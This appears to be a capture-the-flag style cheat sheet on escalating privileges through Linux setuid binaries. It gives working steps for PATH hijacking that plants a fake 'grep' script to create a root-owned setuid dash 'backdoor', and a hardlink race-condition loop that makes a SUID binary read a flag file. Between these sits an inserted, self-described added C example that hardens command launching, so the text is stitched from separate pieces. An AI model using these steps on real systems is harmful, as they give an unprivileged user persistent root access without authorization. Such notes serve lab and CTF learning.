Run ltrace (if installed) on the binary and see if it calls a system command with no path defined

To add the current directory to PATH:

export PATH=.:$PATH

#Create a script named the same as a system command the setuid binary uses, e.g., grep

#Script contents

#!/bin/dash
# dash keeps setuid permissions.

#Whatever command you want to run, e.g.:

cp /bin/dash backdoor

chown root:root backdoor

chmod u+s backdoor

#chmod 755 scriptname

#Run setuid binary
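The defensive counterpart to the ltrace check above, as an added example that is not from this page: a hypothetical helper showing how a setuid program should launch an external command so that a caller-controlled PATH (the `PATH=.:$PATH` trick) has no effect. The function name, the fixed environment and the test commands are assumptions.

```c
#include <errno.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical hardened launcher for a setuid program (added example).
 * The vulnerable pattern is system("grep ...") or execvp("grep", ...):
 * both resolve the command through PATH, which the unprivileged caller
 * controls. This version:
 *   1. rejects anything that is not an absolute path,
 *   2. replaces the caller's environment with a fixed minimal one,
 *   3. uses execve() directly, so no shell and no PATH lookup is involved.
 * Returns the child's exit status, or -1 on a rejected path or failure. */

static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

int run_fixed_path(const char *abs_path, char *const argv[]) {
    if (abs_path == NULL || abs_path[0] != '/') {
        /* A bare name such as "grep" would be looked up via PATH; refuse it.
         * An audit with ltrace/strace should never show such a call from
         * a setuid binary. */
        errno = EINVAL;
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, SAFE_ENV);   /* fixed env, no shell */
        _exit(127);                         /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

A relative command name is rejected before any process is created, while an absolute one runs with the fixed environment and its exit status is returned.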

Run in a directory in which the current user can write. SUID binary is at /path/binary

cp /bin/cat 'asdf (deleted)'

while true; do ln /path/binary ./asdf; (./asdf ../poetry/flag &); rm asdf; done

This works because of a race condition. The while loop hard-links the binary, runs it in the background, and then deletes the link. The hard link then switches to the name of the binary plus "(deleted)", and the second time through the while loop runs that.